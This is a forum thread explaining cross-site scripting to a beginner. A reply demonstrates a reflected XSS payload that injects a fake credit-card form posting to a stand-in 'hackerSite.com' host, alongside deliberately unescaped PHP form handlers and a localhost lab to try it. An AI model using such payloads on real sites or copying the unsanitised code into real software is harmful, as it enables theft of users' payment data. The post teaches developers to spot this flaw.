Hello
How do we call the attack that consists in inserting PHP/JavaScript codes within a remote website's pages ?
Thank you
begueradj
GliderPilot 33 Posting Whiz
I think you're talking about XSS or Cross-Site Scripting
veedeoo 474 Junior Poster Featured Poster
I totally agree with GliderPilot. Most hackers are not really interested in breaking the target site. What they really after for is to steal information from the user.
Allow me to give you the very basic example and vulnerability demonstration of the form.
Let say, we have a form on our site. I will be using the weakest type of form implementation I have ever from askers here on daniweb. Something like this
<form action="hackme.php" method="request">
<label>Type Your Name</label>
<input type="text" name="name">
<br/>
<textarea name="comment"></textarea>
<br/>
<input type="submit" name="submit" value="submit"/>
</form>
and the form processor for the above for is written like this...
if(isset($_REQUEST['submit'])){
echo $_REQUEST['name'];
echo '<br/>';
echo $_REQUEST['comment'].'<br/>';
}
The hacker will visit your site and look at the html source of your form page. He will be able to get the information of your form processor hackme.php and the type of action used request.
The hacker will then test if your site can be injected by pasting this to the browser.
http://yourdomain.com/hackme.php?name=hello Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action=http://hackerSite.com/gotcha.php method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit
The hacker will then check if the form injected on your form will be shown on the page. If it does, they generate links to your site's form processors. The unsuspecting users will then type in their info. and the injected form will be process on the hacker's site.
Try this on your localhost. Create a file name hack.php and paste the codes below
<?php
$form = '<form action="hack.php" method="request">
<label>Type Your Name</label>
<input type="text" name="name">
<br/>
<textarea name="comment"></textarea>
<br/>
<input type="submit" name="submit" value="submit"/>
</form>';
if(isset($_REQUEST['submit'])){
echo $_REQUEST['name'];
echo '<br/>';
echo $_REQUEST['comment'].'<br/>';
}
else{
echo $form;
}
Create another file called hacked.php and paste codes below
<?php
if(isset($_POST['submit'])){
echo $_POST['cc'].'<br/>';
}
Open your favorite browser and paste the injection codes below.
localhost/hack.php?name=hello Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action='localhost/hacked.php' method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit
Hit enter, the hack.ph page should create the injected form asking for credit card number. Now type any number on the input and hit submit. That should take you to the hacked.php.
Example above is pretty classic, but any unsuspecting new web developer can easily overlook this type of vulnerability.
veedeoo 474 Junior Poster Featured Poster
I just want to add that my demonstration will work even on upload form. So, be careful if your site is allowing users to upload. You need to screen those files if they are allowed or not. Otherwise, malicious scripts can be uploaded to your site.
Be a part of the DaniWeb community
We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.